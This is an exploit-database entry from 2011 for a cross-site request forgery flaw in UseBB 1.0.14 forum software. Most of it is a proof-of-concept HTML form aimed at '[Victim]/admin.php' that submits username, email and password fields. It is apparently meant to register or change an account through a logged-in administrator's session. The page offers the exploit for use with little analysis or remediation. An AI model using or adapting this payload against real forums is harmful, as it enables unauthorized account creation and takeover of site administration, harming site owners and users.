UseBB 1.0.14 CSRF Vulnerability

ID 1337DAY-ID-17271
Type zdt
Reporter Muhammet Cagri
Modified 2011-12-11T00:00:00


Exploit for php platform in category web applications

                                            UseBB 1.0.14 CSRF Vulnerability

Author : Muhammet Cagri Tepebasili

Date : 11.12.2011

Script & Demo : UseBB

Version : 1.0.14

Tested On : Linux Mint 11

Exploit :

<label><b>UseBB 1.0.14 CSRF Vulnerability | Author : Muhammet Cagri Tepebasili</b></label><br>
<label> Note : Your Password must be min 8 charecter.</label><br>
<form action="[Victim]/admin.php" method="post">
<table id="adminregulartable">
<tr><td class="fieldtitle">Username
<input type="text" size="30" name="name" id="name" maxlength="255" value="" /><div class="moreinfo">
<tr><td class="fieldtitle">Email
input type="text" size="30" name="email" maxlength="255" value=""/></td></tr>
<tr><td class="fieldtitle">Password
<small>*</small></td><td><input type="password" size="30" name="passwd1" maxlength="255" /><div class="moreinfo"></div></td></tr>
<tr><td class="fieldtitle">
<small>*</small></td><td><input type="password" size="30" name="passwd2" maxlength="255" /></td></tr>
<tr><td colspan="2" class="submit"><input type="submit" value="Register" /><input type="reset" value="Reset" /></td></tr></table></form>

Greetz : Eymen Sen , Cafer K.Sezer and Baris Turan

# [2018-01-02]  #